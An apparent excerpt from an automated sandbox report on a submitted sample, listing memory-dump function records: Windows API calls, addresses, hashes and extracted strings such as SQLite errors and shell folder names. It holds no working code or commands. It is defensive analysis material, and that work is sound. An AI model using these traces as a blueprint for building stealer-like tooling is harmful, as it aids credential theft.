                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscpy
                                                                                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                              • API String ID: 1284135714-318151290
                                                                                                                                                              • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                              • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                              • String ID: 0$6
                                                                                                                                                              • API String ID: 4066108131-3849865405
                                                                                                                                                              • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                              • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004082EF
                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                              • memset.MSVCRT ref: 00408362
                                                                                                                                                              • memset.MSVCRT ref: 00408377
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$ByteCharMultiWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 290601579-0
                                                                                                                                                              • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                              • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                              APIs
                                                                                                                                                              • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                              • memset.MSVCRT ref: 0044505E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memchrmemset
                                                                                                                                                              • String ID: PD$PD
                                                                                                                                                              • API String ID: 1581201632-2312785699
                                                                                                                                                              • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                              • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                              • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2163313125-0
                                                                                                                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$wcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3592753638-3916222277
                                                                                                                                                              • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                              • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040A47B
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                              • String ID: %s (%s)$YV@
                                                                                                                                                              • API String ID: 3979103747-598926743
                                                                                                                                                              • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                              • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                              • API String ID: 2780580303-317687271
                                                                                                                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                                                                                              • API String ID: 2767993716-572158859
                                                                                                                                                              • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                              • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                              • API String ID: 3176057301-2039793938
                                                                                                                                                              • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                              • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                              • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                              • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                              • out of memory, xrefs: 0042F865
                                                                                                                                                              • database is already attached, xrefs: 0042F721
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                              • API String ID: 1297977491-2001300268
                                                                                                                                                              • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                              • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                                                              • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                              • String ID: ($d
                                                                                                                                                              • API String ID: 1140211610-1915259565
                                                                                                                                                              • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                              • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                              APIs
                                                                                                                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3015003838-0
                                                                                                                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00407E44
                                                                                                                                                              • memset.MSVCRT ref: 00407E5B
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                              • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 59245283-0
                                                                                                                                                              • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                              • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
